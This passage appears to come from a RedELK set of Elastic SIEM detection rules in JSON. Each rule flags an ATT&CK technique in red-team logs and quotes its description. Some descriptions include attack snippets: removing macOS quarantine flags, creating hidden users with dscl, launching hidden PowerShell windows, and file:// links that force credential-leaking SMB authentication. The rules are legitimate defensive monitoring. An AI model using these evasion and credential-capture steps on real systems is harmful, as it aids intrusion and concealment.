ATT&CK","technique":[{"reference":"https://attack.mitre.org/techniques/T1181","name":"Extra Window Memory Injection","id":"T1181"}],"tactic":{"reference":"https://attack.mitre.org/tactics/TA0004","name":"Privilege Escalation","id":"TA0004"}}],"throttle":"no_actions","note":"","version":1,"exceptions_list":[]} +{"author":["Lorenzo Bernardi"],"actions":[],"description":"Adversaries may directly access a volume to bypass file access controls and file system monitoring. Windows allows programs to have direct access to logical volumes. Programs with direct access may read and write files directly from the drive by analyzing file system data structures. This technique bypasses Windows file access controls as well as file system monitoring tools. [1]\nUtilities, such as NinjaCopy, exist to perform these actions in PowerShell. [2]","enabled":true,"false_positives":[],"from":"now-360s","immutable":false,"index":["rtops-*"],"interval":"5m","rule_id":"redelk-rule-T1006","language":"kuery","license":"BSD 3-clause","output_index":".siem-signals-default","max_signals":100,"risk_score":50,"risk_score_mapping":[],"name":"[T1006] File System Logical Offsets","query":"threat.technique.id: T1006","references":["https://attack.mitre.org/techniques/T1006"],"severity":"low","severity_mapping":[],"tags":["RedELK"],"to":"now","type":"query","threat":[{"framework":"MITRE ATT&CK","technique":[{"reference":"https://attack.mitre.org/techniques/T1006","name":"File System Logical Offsets","id":"T1006"}],"tactic":{"reference":"https://attack.mitre.org/tactics/TA0005","name":"Defense Evasion","id":"TA0005"}}],"throttle":"no_actions","note":"","version":1,"exceptions_list":[]} +{"author":["Lorenzo Bernardi"],"actions":[],"description":"Adversaries may delete files left behind by the actions of their intrusion activity. Malware, tools, or other non-native files dropped or created on a system by an adversary may leave traces to indicate to what was done within a network and how. Removal of these files can occur during an intrusion, or as part of a post-intrusion process to minimize the adversary's footprint.\nThere are tools available from the host operating system to perform cleanup, but adversaries may use other tools as well. Examples include native cmd functions such as DEL, secure deletion tools such as Windows Sysinternals SDelete, or other third-party file deletion tools. [1]","enabled":true,"false_positives":[],"from":"now-360s","immutable":false,"index":["rtops-*"],"interval":"5m","rule_id":"redelk-rule-T1107","language":"kuery","license":"BSD 3-clause","output_index":".siem-signals-default","max_signals":100,"risk_score":50,"risk_score_mapping":[],"name":"[T1107] File Deletion","query":"threat.technique.id: T1107","references":["https://attack.mitre.org/techniques/T1107","https://attack.mitre.org/techniques/T1070/004"],"severity":"low","severity_mapping":[],"tags":["RedELK"],"to":"now","type":"query","threat":[{"framework":"MITRE ATT&CK","technique":[{"reference":"https://attack.mitre.org/techniques/T1107","name":"File Deletion","id":"T1107"}],"tactic":{"reference":"https://attack.mitre.org/tactics/TA0005","name":"Defense Evasion","id":"TA0005"}}],"throttle":"no_actions","note":"","version":1,"exceptions_list":[]} +{"author":["Lorenzo Bernardi"],"actions":[],"description":"Adversaries may execute their own malicious payloads by hijacking the binaries used by services. Adversaries may use flaws in the permissions of Windows services to replace the binary that is executed upon service start. These service processes may automatically execute specific binaries as part of their functionality or to perform other actions. If the permissions on the file system directory containing a target binary, or permissions on the binary itself are improperly set, then the target binary may be overwritten with another binary using user-level permissions and executed by the original process. If the original process and thread are running under a higher permissions level, then the replaced binary will also execute under higher-level permissions, which could include SYSTEM.\nAdversaries may use this technique to replace legitimate binaries with malicious ones as a means of executing code at a higher permissions level. If the executing process is set to run at a specific time or during a certain event (e.g., system bootup) then this technique can also be used for persistence.","enabled":true,"false_positives":[],"from":"now-360s","immutable":false,"index":["rtops-*"],"interval":"5m","rule_id":"redelk-rule-T1044","language":"kuery","license":"BSD 3-clause","output_index":".siem-signals-default","max_signals":100,"risk_score":50,"risk_score_mapping":[],"name":"[T1044] File System Permissions Weakness","query":"threat.technique.id: T1044","references":["https://attack.mitre.org/techniques/T1044","https://attack.mitre.org/techniques/T1574/010"],"severity":"low","severity_mapping":[],"tags":["RedELK"],"to":"now","type":"query","threat":[{"framework":"MITRE ATT&CK","technique":[{"reference":"https://attack.mitre.org/techniques/T1044","name":"File System Permissions Weakness","id":"T1044"}],"tactic":{"reference":"https://attack.mitre.org/tactics/TA0003","name":"Persistence","id":"TA0003"}},{"framework":"MITRE ATT&CK","technique":[{"reference":"https://attack.mitre.org/techniques/T1044","name":"File System Permissions Weakness","id":"T1044"}],"tactic":{"reference":"https://attack.mitre.org/tactics/TA0004","name":"Privilege Escalation","id":"TA0004"}}],"throttle":"no_actions","note":"","version":1,"exceptions_list":[]} +{"author":["Lorenzo Bernardi"],"actions":[],"description":"Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.\nMany command shell utilities can be used to obtain this information. Examples include dir, tree, ls, find, and locate. [1] Custom tools may also be used to gather file and directory information and interact with the Native API.","enabled":true,"false_positives":[],"from":"now-360s","immutable":false,"index":["rtops-*"],"interval":"5m","rule_id":"redelk-rule-T1083","language":"kuery","license":"BSD 3-clause","output_index":".siem-signals-default","max_signals":100,"risk_score":50,"risk_score_mapping":[],"name":"[T1083] File and Directory Discovery","query":"threat.technique.id: T1083","references":["https://attack.mitre.org/techniques/T1083"],"severity":"low","severity_mapping":[],"tags":["RedELK"],"to":"now","type":"query","threat":[{"framework":"MITRE ATT&CK","technique":[{"reference":"https://attack.mitre.org/techniques/T1083","name":"File and Directory Discovery","id":"T1083"}],"tactic":{"reference":"https://attack.mitre.org/tactics/TA0007","name":"Discovery","id":"TA0007"}}],"throttle":"no_actions","note":"","version":1,"exceptions_list":[]} +{"author":["Lorenzo Bernardi"],"actions":[],"description":"Adversaries may modify file or directory permissions/attributes to evade access control lists (ACLs) and access protected files.[1][2] File and directory permissions are commonly managed by ACLs configured by the file or directory owner, or users with the appropriate permissions. File and directory ACL implementations vary by platform, but generally explicitly designate which users or groups can perform which actions (read, write, execute, etc.).\nModifications may include changing specific access rights, which may require taking ownership of a file or directory and/or elevated permissions depending on the file or directory’s existing permissions. This may enable malicious activity such as modifying, replacing, or deleting specific files or directories. Specific file and directory modifications may be a required step for many techniques, such as establishing Persistence via Accessibility Features, Boot or Logon Initialization Scripts, .bash_profile and .bashrc, or tainting/hijacking other instrumental binary/configuration files via Hijack Execution Flow.","enabled":true,"false_positives":[],"from":"now-360s","immutable":false,"index":["rtops-*"],"interval":"5m","rule_id":"redelk-rule-T1222","language":"kuery","license":"BSD 3-clause","output_index":".siem-signals-default","max_signals":100,"risk_score":50,"risk_score_mapping":[],"name":"[T1222] File and Directory Permissions Modification","query":"threat.technique.id: T1222","references":["https://attack.mitre.org/techniques/T1222"],"severity":"low","severity_mapping":[],"tags":["RedELK"],"to":"now","type":"query","threat":[{"framework":"MITRE ATT&CK","technique":[{"reference":"https://attack.mitre.org/techniques/T1222","name":"File and Directory Permissions Modification","id":"T1222"}],"tactic":{"reference":"https://attack.mitre.org/tactics/TA0005","name":"Defense Evasion","id":"TA0005"}}],"throttle":"no_actions","note":"","version":1,"exceptions_list":[]} +{"author":["Lorenzo Bernardi"],"actions":[],"description":"Adversaries may overwrite or corrupt the flash memory contents of system BIOS or other firmware in devices attached to a system in order to render them inoperable or unable to boot.[1] Firmware is software that is loaded and executed from non-volatile memory on hardware devices in order to initialize and manage device functionality. These devices could include the motherboard, hard drive, or video cards.","enabled":true,"false_positives":[],"from":"now-360s","immutable":false,"index":["rtops-*"],"interval":"5m","rule_id":"redelk-rule-T1495","language":"kuery","license":"BSD 3-clause","output_index":".siem-signals-default","max_signals":100,"risk_score":50,"risk_score_mapping":[],"name":"[T1495] Firmware Corruption","query":"threat.technique.id: T1495","references":["https://attack.mitre.org/techniques/T1495"],"severity":"low","severity_mapping":[],"tags":["RedELK"],"to":"now","type":"query","threat":[{"framework":"MITRE ATT&CK","technique":[{"reference":"https://attack.mitre.org/techniques/T1495","name":"Firmware Corruption","id":"T1495"}],"tactic":{"reference":"https://attack.mitre.org/tactics/TA0040","name":"Impact","id":"TA0040"}}],"throttle":"no_actions","note":"","version":1,"exceptions_list":[]} +{"author":["Lorenzo Bernardi"],"actions":[],"description":"Adversaries may gather credential material by invoking or forcing a user to automatically provide authentication information through a mechanism in which they can intercept.\nThe Server Message Block (SMB) protocol is commonly used in Windows networks for authentication and communication between systems for access to resources and file sharing. When a Windows system attempts to connect to an SMB resource it will automatically attempt to authenticate and send credential information for the current user to the remote system. [1] This behavior is typical in enterprise environments so that users do not need to enter credentials to access network resources.\nWeb Distributed Authoring and Versioning (WebDAV) is also typically used by Windows systems as a backup protocol when SMB is blocked or fails. WebDAV is an extension of HTTP and will typically operate over TCP ports 80 and 443. [2] [3]\nAdversaries may take advantage of this behavior to gain access to user account hashes through forced SMB/WebDAV authentication. An adversary can send an attachment to a user through spearphishing that contains a resource link to an external server controlled by the adversary (i.e. Template Injection), or place a specially crafted file on navigation path for privileged accounts (e.g. .SCF file placed on desktop) or on a publicly accessible share to be accessed by victim(s). When the user's system accesses the untrusted resource it will attempt authentication and send information, including the user's hashed credentials, over SMB to the adversary controlled server. [4] With access to the credential hash, an adversary can perform off-line Brute Force cracking to gain access to plaintext credentials. [5]\nThere are several different ways this can occur. [6] Some specifics from in-the-wild use include:\nA spearphishing attachment containing a document with a resource that is automatically loaded when the document is opened (i.e. Template Injection). The document can include, for example, a request similar to file[:]//[remote address]/Normal.dotm to trigger the SMB request. [7]\nA modified .LNK or .SCF file with the icon filename pointing to an external reference such as \\[remote address]\\pic.png that will force the system to load the resource when the icon is rendered to repeatedly gather credentials. [7]","enabled":true,"false_positives":[],"from":"now-360s","immutable":false,"index":["rtops-*"],"interval":"5m","rule_id":"redelk-rule-T1187","language":"kuery","license":"BSD 3-clause","output_index":".siem-signals-default","max_signals":100,"risk_score":50,"risk_score_mapping":[],"name":"[T1187] Forced Authentication","query":"threat.technique.id: T1187","references":["https://attack.mitre.org/techniques/T1187"],"severity":"low","severity_mapping":[],"tags":["RedELK"],"to":"now","type":"query","threat":[{"framework":"MITRE ATT&CK","technique":[{"reference":"https://attack.mitre.org/techniques/T1187","name":"Forced Authentication","id":"T1187"}],"tactic":{"reference":"https://attack.mitre.org/tactics/TA0006","name":"Credential Access","id":"TA0006"}}],"throttle":"no_actions","note":"","version":1,"exceptions_list":[]} +{"author":["Lorenzo Bernardi"],"actions":[],"description":"Graphical User Interface","enabled":true,"false_positives":[],"from":"now-360s","immutable":false,"index":["rtops-*"],"interval":"5m","rule_id":"redelk-rule-T1061","language":"kuery","license":"BSD 3-clause","output_index":".siem-signals-default","max_signals":100,"risk_score":50,"risk_score_mapping":[],"name":"[T1061] Graphical User Interface","query":"threat.technique.id: T1061","references":["https://attack.mitre.org/techniques/T1061","https://attack.mitre.org/techniques/T1021"],"severity":"low","severity_mapping":[],"tags":["RedELK"],"to":"now","type":"query","threat":[{"framework":"MITRE ATT&CK","technique":[{"reference":"https://attack.mitre.org/techniques/T1061","name":"Graphical User Interface","id":"T1061"}],"tactic":{"reference":"https://attack.mitre.org/tactics/TA0002","name":"Execution","id":"TA0002"}}],"throttle":"no_actions","note":"","version":1,"exceptions_list":[]} +{"author":["Lorenzo Bernardi"],"actions":[],"description":"Adversaries may modify file attributes that signify programs are from untrusted sources to subvert Gatekeeper controls. In macOS and OS X, when applications or programs are downloaded from the internet, there is a special attribute set on the file called com.apple.quarantine. This attribute is read by Apple's Gatekeeper defense program at execution time and provides a prompt to the user to allow or deny execution.\nApps loaded onto the system from USB flash drive, optical disk, external hard drive, or even from a drive shared over the local network won’t set this flag. Additionally, it is possible to avoid setting this flag using Drive-by Compromise. This completely bypasses the built-in Gatekeeper check. [1] The presence of the quarantine flag can be checked by the xattr command xattr /path/to/MyApp.app for com.apple.quarantine. Similarly, given sudo access or elevated permission, this attribute can be removed with xattr as well, sudo xattr -r -d com.apple.quarantine /path/to/MyApp.app. [2] [3]\nIn typical operation, a file will be downloaded from the internet and given a quarantine flag before being saved to disk. When the user tries to open the file or application, macOS’s gatekeeper will step in and check for the presence of this flag. If it exists, then macOS will then prompt the user to confirmation that they want to run the program and will even provide the URL where the application came from. However, this is all based on the file being downloaded from a quarantine-savvy application. [4]","enabled":true,"false_positives":[],"from":"now-360s","immutable":false,"index":["rtops-*"],"interval":"5m","rule_id":"redelk-rule-T1144","language":"kuery","license":"BSD 3-clause","output_index":".siem-signals-default","max_signals":100,"risk_score":50,"risk_score_mapping":[],"name":"[T1144] Gatekeeper Bypass","query":"threat.technique.id: T1144","references":["https://attack.mitre.org/techniques/T1144","https://attack.mitre.org/techniques/T1553/001"],"severity":"low","severity_mapping":[],"tags":["RedELK"],"to":"now","type":"query","threat":[{"framework":"MITRE ATT&CK","technique":[{"reference":"https://attack.mitre.org/techniques/T1144","name":"Gatekeeper Bypass","id":"T1144"}],"tactic":{"reference":"https://attack.mitre.org/tactics/TA0005","name":"Defense Evasion","id":"TA0005"}}],"throttle":"no_actions","note":"","version":1,"exceptions_list":[]} +{"author":["Lorenzo Bernardi"],"actions":[],"description":"Adversaries may modify Group Policy Objects (GPOs) to subvert the intended discretionary access controls for a domain, usually with the intention of escalating privileges on the domain. Group policy allows for centralized management of user and computer settings in Active Directory (AD). GPOs are containers for group policy settings made up of files stored within a predicable network path \\<DOMAIN>\\SYSVOL\\<DOMAIN>\\Policies\\.[1][2]\nLike other objects in AD, GPOs have access controls associated with them. By default all user accounts in the domain have permission to read GPOs. It is possible to delegate GPO access control permissions, e.g. write access, to specific users or groups in the domain.\nMalicious GPO modifications can be used to implement many other malicious behaviors such as Scheduled Task/Job, Disable or Modify Tools, Ingress Tool Transfer, Create Account, Service Execution, and more.[2][3][4][5][6] Since GPOs can control so many user and machine settings in the AD environment, there are a great number of potential attacks that can stem from this GPO abuse.[3]\nFor example, publicly available scripts such as New-GPOImmediateTask can be leveraged to automate the creation of a malicious Scheduled Task/Job by modifying GPO settings, in this case modifying <GPO_PATH>\\Machine\\Preferences\\ScheduledTasks\\ScheduledTasks.xml.[3][4] In some cases an adversary might modify specific user rights like SeEnableDelegationPrivilege, set in <GPO_PATH>\\MACHINE\\Microsoft\\Windows NT\\SecEdit\\GptTmpl.inf, to achieve a subtle AD backdoor with complete control of the domain because the user account under the adversary's control would then be able to modify GPOs.[7]","enabled":true,"false_positives":[],"from":"now-360s","immutable":false,"index":["rtops-*"],"interval":"5m","rule_id":"redelk-rule-T1484","language":"kuery","license":"BSD 3-clause","output_index":".siem-signals-default","max_signals":100,"risk_score":50,"risk_score_mapping":[],"name":"[T1484] Group Policy Modification","query":"threat.technique.id: T1484","references":["https://attack.mitre.org/techniques/T1484"],"severity":"low","severity_mapping":[],"tags":["RedELK"],"to":"now","type":"query","threat":[{"framework":"MITRE ATT&CK","technique":[{"reference":"https://attack.mitre.org/techniques/T1484","name":"Group Policy Modification","id":"T1484"}],"tactic":{"reference":"https://attack.mitre.org/tactics/TA0005","name":"Defense Evasion","id":"TA0005"}}],"throttle":"no_actions","note":"","version":1,"exceptions_list":[]} +{"author":["Lorenzo Bernardi"],"actions":[],"description":"Adversaries may introduce computer accessories, computers, or networking hardware into a system or network that can be used as a vector to gain access. While public references of usage by APT groups are scarce, many penetration testers leverage hardware additions for initial access. Commercial and open source products are leveraged with capabilities such as passive network tapping [1], man-in-the middle encryption breaking [2], keystroke injection [3], kernel memory reading via DMA [4], adding new wireless access to an existing network [5], and others.","enabled":true,"false_positives":[],"from":"now-360s","immutable":false,"index":["rtops-*"],"interval":"5m","rule_id":"redelk-rule-T1200","language":"kuery","license":"BSD 3-clause","output_index":".siem-signals-default","max_signals":100,"risk_score":50,"risk_score_mapping":[],"name":"[T1200] Hardware Additions","query":"threat.technique.id: T1200","references":["https://attack.mitre.org/techniques/T1200"],"severity":"low","severity_mapping":[],"tags":["RedELK"],"to":"now","type":"query","threat":[{"framework":"MITRE ATT&CK","technique":[{"reference":"https://attack.mitre.org/techniques/T1200","name":"Hardware Additions","id":"T1200"}],"tactic":{"reference":"https://attack.mitre.org/tactics/TA0001","name":"Initial Access","id":"TA0001"}}],"throttle":"no_actions","note":"","version":1,"exceptions_list":[]} +{"author":["Lorenzo Bernardi"],"actions":[],"description":"Adversaries may configure HISTCONTROL to not log all command history. The HISTCONTROL environment variable keeps track of what should be saved by the history command and eventually into the ~/.bash_history file when a user logs out. HISTCONTROL does not exist by default on macOS, but can be set by the user and will be respected.\nThis setting can be configured to ignore commands that start with a space by simply setting it to \"ignorespace\". HISTCONTROL can also be set to ignore duplicate commands by setting it to \"ignoredups\". In some Linux systems, this is set by default to \"ignoreboth\" which covers both of the previous examples. This means that \" ls\" will not be saved, but \"ls\" would be saved by history.\nAdversaries can abuse this to operate without leaving traces by simply prepending a space to all of their terminal commands.","enabled":true,"false_positives":[],"from":"now-360s","immutable":false,"index":["rtops-*"],"interval":"5m","rule_id":"redelk-rule-T1148","language":"kuery","license":"BSD 3-clause","output_index":".siem-signals-default","max_signals":100,"risk_score":50,"risk_score_mapping":[],"name":"[T1148] HISTCONTROL","query":"threat.technique.id: T1148","references":["https://attack.mitre.org/techniques/T1148","https://attack.mitre.org/techniques/T1562/003"],"severity":"low","severity_mapping":[],"tags":["RedELK"],"to":"now","type":"query","threat":[{"framework":"MITRE ATT&CK","technique":[{"reference":"https://attack.mitre.org/techniques/T1148","name":"HISTCONTROL","id":"T1148"}],"tactic":{"reference":"https://attack.mitre.org/tactics/TA0005","name":"Defense Evasion","id":"TA0005"}}],"throttle":"no_actions","note":"","version":1,"exceptions_list":[]} +{"author":["Lorenzo Bernardi"],"actions":[],"description":"Adversaries may set files and directories to be hidden to evade detection mechanisms. To prevent normal users from accidentally changing special files on a system, most operating systems have the concept of a ‘hidden’ file. These files don’t show up when a user browses the file system with a GUI or when using normal commands on the command line. Users must explicitly ask to show the hidden files either via a series of Graphical User Interface (GUI) prompts or with command line switches (dir /a for Windows and ls –a for Linux and macOS).\nOn Linux and Mac, users can mark specific files as hidden simply by putting a \".\" as the first character in the file or folder name [1] [2]. Files and folders that start with a period, ‘.’, are by default hidden from being viewed in the Finder application and standard command-line utilities like \"ls\". Users must specifically change settings to have these files viewable.\nFiles on macOS can also be marked with the UF_HIDDEN flag which prevents them from being seen in Finder.app, but still allows them to be seen in Terminal.app [3]. On Windows, users can mark specific files as hidden by using the attrib.exe binary. Many applications create these hidden files and folders to store information so that it doesn’t clutter up the user’s workspace. For example, SSH utilities create a .ssh folder that’s hidden and contains the user’s known hosts and keys.\nAdversaries can use this to their advantage to hide files and folders anywhere on the system and evading a typical user or system analysis that does not incorporate investigation of hidden files.","enabled":true,"false_positives":[],"from":"now-360s","immutable":false,"index":["rtops-*"],"interval":"5m","rule_id":"redelk-rule-T1158","language":"kuery","license":"BSD 3-clause","output_index":".siem-signals-default","max_signals":100,"risk_score":50,"risk_score_mapping":[],"name":"[T1158] Hidden Files and Directories","query":"threat.technique.id: T1158","references":["https://attack.mitre.org/techniques/T1158","https://attack.mitre.org/techniques/T1564/001"],"severity":"low","severity_mapping":[],"tags":["RedELK"],"to":"now","type":"query","threat":[{"framework":"MITRE ATT&CK","technique":[{"reference":"https://attack.mitre.org/techniques/T1158","name":"Hidden Files and Directories","id":"T1158"}],"tactic":{"reference":"https://attack.mitre.org/tactics/TA0005","name":"Defense Evasion","id":"TA0005"}},{"framework":"MITRE ATT&CK","technique":[{"reference":"https://attack.mitre.org/techniques/T1158","name":"Hidden Files and Directories","id":"T1158"}],"tactic":{"reference":"https://attack.mitre.org/tactics/TA0003","name":"Persistence","id":"TA0003"}}],"throttle":"no_actions","note":"","version":1,"exceptions_list":[]} +{"author":["Lorenzo Bernardi"],"actions":[],"description":"Adversaries may use hidden windows to conceal malicious activity from the plain sight of users. In some cases, windows that would typically be displayed when an application carries out an operation can be hidden. This may be utilized by system administrators to avoid disrupting user work environments when carrying out administrative tasks.\nOn Windows, there are a variety of features in scripting languages in Windows, such as PowerShell, Jscript, and Visual Basic to make windows hidden. One example of this is powershell.exe -WindowStyle Hidden. [1]\nSimilarly, on macOS the configurations for how applications run are listed in property list (plist) files. One of the tags in these files can be apple.awt.UIElement, which allows for Java applications to prevent the application's icon from appearing in the Dock. A common use for this is when applications run in the system tray, but don't also want to show up in the Dock.\nAdversaries may abuse these functionalities to hide otherwise visible windows from users so as not to alert the user to adversary activity on the system.[2]","enabled":true,"false_positives":[],"from":"now-360s","immutable":false,"index":["rtops-*"],"interval":"5m","rule_id":"redelk-rule-T1143","language":"kuery","license":"BSD 3-clause","output_index":".siem-signals-default","max_signals":100,"risk_score":50,"risk_score_mapping":[],"name":"[T1143] Hidden Window","query":"threat.technique.id: T1143","references":["https://attack.mitre.org/techniques/T1143","https://attack.mitre.org/techniques/T1564/003"],"severity":"low","severity_mapping":[],"tags":["RedELK"],"to":"now","type":"query","threat":[{"framework":"MITRE ATT&CK","technique":[{"reference":"https://attack.mitre.org/techniques/T1143","name":"Hidden Window","id":"T1143"}],"tactic":{"reference":"https://attack.mitre.org/tactics/TA0005","name":"Defense Evasion","id":"TA0005"}}],"throttle":"no_actions","note":"","version":1,"exceptions_list":[]} +{"author":["Lorenzo Bernardi"],"actions":[],"description":"Adversaries may use hidden users to mask the presence of user accounts they create. Every user account in macOS has a userID associated with it. When creating a user, you can specify the userID for that account.\nThere is a property value in /Library/Preferences/com.apple.loginwindow called Hide500Users that prevents users with userIDs 500 and lower from appearing at the login screen. When using the Create Account technique with a userID under 500 (ex: sudo dscl . -create /Users/username UniqueID 401) and enabling this property (setting it to Yes), an adversary can conceal user accounts. [1].","enabled":true,"false_positives":[],"from":"now-360s","immutable":false,"index":["rtops-*"],"interval":"5m","rule_id":"redelk-rule-T1147","language":"kuery","license":"BSD 3-clause","output_index":".siem-signals-default","max_signals":100,"risk_score":50,"risk_score_mapping":[],"name":"[T1147] Hidden Users","query":"threat.technique.id: T1147","references":["https://attack.mitre.org/techniques/T1147","https://attack.mitre.org/techniques/T1564/002"],"severity":"low","severity_mapping":[],"tags":["RedELK"],"to":"now","type":"query","threat":[{"framework":"MITRE ATT&CK","technique":[{"reference":"https://attack.mitre.org/techniques/T1147","name":"Hidden Users","id":"T1147"}],"tactic":{"reference":"https://attack.mitre.org/tactics/TA0005","name":"Defense Evasion","id":"TA0005"}}],"throttle":"no_actions","note":"","version":1,"exceptions_list":[]} +{"author":["Lorenzo Bernardi"],"actions":[],"description":"Adversaries may hook into Windows application programming interface (API) functions to collect user credentials. Malicious hooking mechanisms may capture API calls that include parameters that reveal user authentication credentials.[1] Unlike Keylogging, this technique focuses specifically on API functions that include parameters that reveal user credentials. Hooking involves redirecting calls to these functions and can be implemented via:\nHooks procedures, which intercept and execute designated code in response to events such as messages, keystrokes, and mouse inputs.[2][3]\nImport address table (IAT) hooking, which use modifications to a process’s IAT, where pointers to imported API functions are stored.[3][4][5]\nInline hooking, which overwrites the first bytes in an API function to redirect code flow.[3][6][5]","enabled":true,"false_positives":[],"from":"now-360s","immutable":false,"index":["rtops-*"],"interval":"5m","rule_id":"redelk-rule-T1179","language":"kuery","license":"BSD 3-clause","output_index":".siem-signals-default","max_signals":100,"risk_score":50,"risk_score_mapping":[],"name":"[T1179] Hooking","query":"threat.technique.id: T1179","references":["https://attack.mitre.org/techniques/T1179","https://attack.mitre.org/techniques/T1056/004"],"severity":"low","severity_mapping":[],"tags":["RedELK"],"to":"now","type":"query","threat":[{"framework":"MITRE ATT&CK","technique":[{"reference":"https://attack.mitre.org/techniques/T1179","name":"Hooking","id":"T1179"}],"tactic":{"reference":"https://attack.mitre.org/tactics/TA0003","name":"Persistence","id":"TA0003"}},{"framework":"MITRE ATT&CK","technique":[{"reference":"https://attack.mitre.org/techniques/T1179","name":"Hooking","id":"T1179"}],"tactic":{"reference":"https://attack.mitre.org/tactics/TA0004","name":"Privilege Escalation","id":"TA0004"}},{"framework":"MITRE ATT&CK","technique":[{"reference":"https://attack.mitre.org/techniques/T1179","name":"Hooking","id":"T1179"}],"tactic":{"reference":"https://attack.mitre.org/tactics/TA0006","name":"Credential Access","id":"TA0006"}}],"throttle":"no_actions","note":"","version":1,"exceptions_list":[]} +{"author":["Lorenzo Bernardi"],"actions":[],"description":"Hypervisor","enabled":true,"false_positives":[],"from":"now-360s","immutable":false,"index":["rtops-*"],"interval":"5m","rule_id":"redelk-rule-T1062","language":"kuery","license":"BSD 3-clause","output_index":".siem-signals-default","max_signals":100,"risk_score":50,"risk_score_mapping":[],"name":"[T1062] Hypervisor","query":"threat.technique.id: T1062","references":["https://attack.mitre.org/techniques/T1062"],"severity":"low","severity_mapping":[],"tags":["RedELK"],"to":"now","type":"query","threat":[{"framework":"MITRE ATT&CK","technique":[{"reference":"https://attack.mitre.org/techniques/T1062","name":"Hypervisor","id":"T1062"}],"tactic":{"reference":"https://attack.mitre.org/tactics/TA0003","name":"Persistence","id":"TA0003"}}],"throttle":"no_actions","note":"","version":1,"exceptions_list":[]} +{"author":["Lorenzo Bernardi"],"actions":[],"description":"Image File Execution Options Injection","enabled":true,"false_positives":[],"from":"now-360s","immutable":false,"index":["rtops-*"],"interval":"5m","rule_id":"redelk-rule-T1183","language":"kuery","license":"BSD 3-clause","output_index":".siem-signals-default","max_signals":100,"risk_score":50,"risk_score_mapping":[],"name":"[T1183] Image File Execution Options Injection","query":"threat.technique.id: T1183","references":["https://attack.mitre.org/techniques/T1183","https://attack.mitre.org/techniques/T1546/012"],"severity":"low","severity_mapping":[],"tags":["RedELK"],"to":"now","type":"query","threat":[{"framework":"MITRE ATT&CK","technique":[{"reference":"https://attack.mitre.org/techniques/T1183","name":"Image File Execution Options Injection","id":"T1183"}],"tactic":{"reference":"https://attack.mitre.org/tactics/TA0004","name":"Privilege Escalation","id":"TA0004"}},{"framework":"MITRE ATT&CK","technique":[{"reference":"https://attack.mitre.org/techniques/T1183","name":"Image File Execution Options Injection","id":"T1183"}],"tactic":{"reference":"https://attack.mitre.org/tactics/TA0003","name":"Persistence","id":"TA0003"}},{"framework":"MITRE ATT&CK","technique":[{"reference":"https://attack.mitre.org/techniques/T1183","name":"Image File Execution Options Injection","id":"T1183"}],"tactic":{"reference":"https://attack.mitre.org/tactics/TA0005","name":"Defense Evasion","id":"TA0005"}}],"throttle":"no_actions","note":"","version":1,"exceptions_list":[]} +{"author":["Lorenzo Bernardi"],"actions":[],"description":"Adversaries may implant cloud container images with malicious code to establish persistence. Amazon Web Service (AWS) Amazon Machine Images (AMI), Google Cloud Platform (GCP) Images, and Azure Images as well as popular container runtimes such as Docker can be implanted or backdoored. Depending on how the infrastructure is provisioned, this could provide persistent access if the infrastructure provisioning tool is instructed to always use the latest image.[1]\nA tool has been developed to facilitate planting backdoors in cloud container images.[2] If an attacker has access to a compromised AWS instance, and permissions to list the available container images, they may implant a backdoor such as a Web Shell.[1] Adversaries may also implant Docker images that may be inadvertently used in cloud deployments, which has been reported in some instances of cryptomining botnets.[3]","enabled":true,"false_positives":[],"from":"now-360s","immutable":false,"index":["rtops-*"],"interval":"5m","rule_id":"redelk-rule-T1525","language":"kuery","license":"BSD 3-clause","output_index":".siem-signals-default","max_signals":100,"risk_score":50,"risk_score_mapping":[],"name":"[T1525] Implant Container Image","query":"threat.technique.id: T1525","references":["https://attack.mitre.org/techniques/T1525"],"severity":"low","severity_mapping":[],"tags":["RedELK"],"to":"now","type":"query","threat":[{"framework":"MITRE ATT&CK","technique":[{"reference":"https://attack.mitre.org/techniques/T1525","name":"Implant Container Image","id":"T1525"}],"tactic":{"reference":"https://attack.mitre.org/tactics/TA0003","name":"Persistence","id":"TA0003"}}],"throttle":"no_actions","note":"","version":1,"exceptions_list":[]} +{"author":["Lorenzo Bernardi"],"actions":[],"description":"An adversary may attempt to block indicators or events typically captured by sensors from being gathered and analyzed. This could include maliciously redirecting [1] or even disabling host-based sensors, such as Event Tracing for Windows (ETW),[2] by tampering settings that control the collection and flow of event telemetry. [3] These settings may be stored on the system in configuration files and/or in the Registry as well as being accessible via administrative utilities such as PowerShell or Windows Management Instrumentation.\nETW interruption can be achieved multiple ways, however most directly by defining conditions using the PowerShell Set-EtwTraceProvider cmdlet or by interfacing directly with the Registry to make alterations.\nIn the case of network-based reporting of indicators, an adversary may block traffic associated with reporting to prevent central analysis. This may be accomplished by many means, such as stopping a local process responsible for forwarding telemetry and/or creating a host-based firewall rule to block traffic to specific hosts responsible for aggregating events, such as security information and event management (SIEM) products.","enabled":true,"false_positives":[],"from":"now-360s","immutable":false,"index":["rtops-*"],"interval":"5m","rule_id":"redelk-rule-T1054","language":"kuery","license":"BSD 3-clause","output_index":".siem-signals-default","max_signals":100,"risk_score":50,"risk_score_mapping":[],"name":"[T1054] Indicator Blocking","query":"threat.technique.id: T1054","references":["https://attack.mitre.org/techniques/T1054","https://attack.mitre.org/techniques/T1562/006"],"severity":"low","severity_mapping":[],"tags":["RedELK"],"to":"now","type":"query","threat":[{"framework":"MITRE ATT&CK","technique":[{"reference":"https://attack.mitre.org/techniques/T1054","name":"Indicator Blocking","id":"T1054"}],"tactic":{"reference":"https://attack.mitre.org/tactics/TA0005","name":"Defense Evasion","id":"TA0005"}}],"throttle":"no_actions","note":"","version":1,"exceptions_list":[]} +{"author":["Lorenzo Bernardi"],"actions":[],"description":"Adversaries may delete or alter generated artifacts on a host system, including logs or captured files such as quarantined malware. Locations and format of logs are platform or product-specific, however standard operating system logs are captured as Windows events or Linux/macOS files such as Bash History and /var/log/*.\nThese actions may interfere with event collection, reporting, or other notifications used to detect intrusion activity. This that may compromise the integrity of security solutions by causing notable events to go unreported. This activity may also impede forensic analysis and incident response, due to lack of sufficient data to determine what occurred.","enabled":true,"false_positives":[],"from":"now-360s","immutable":false,"index":["rtops-*"],"interval":"5m","rule_id":"redelk-rule-T1070","language":"kuery","license":"BSD 3-clause","output_index":".siem-signals-default","max_signals":100,"risk_score":50,"risk_score_mapping":[],"name":"[T1070] Indicator Removal on Host","query":"threat.technique.id: 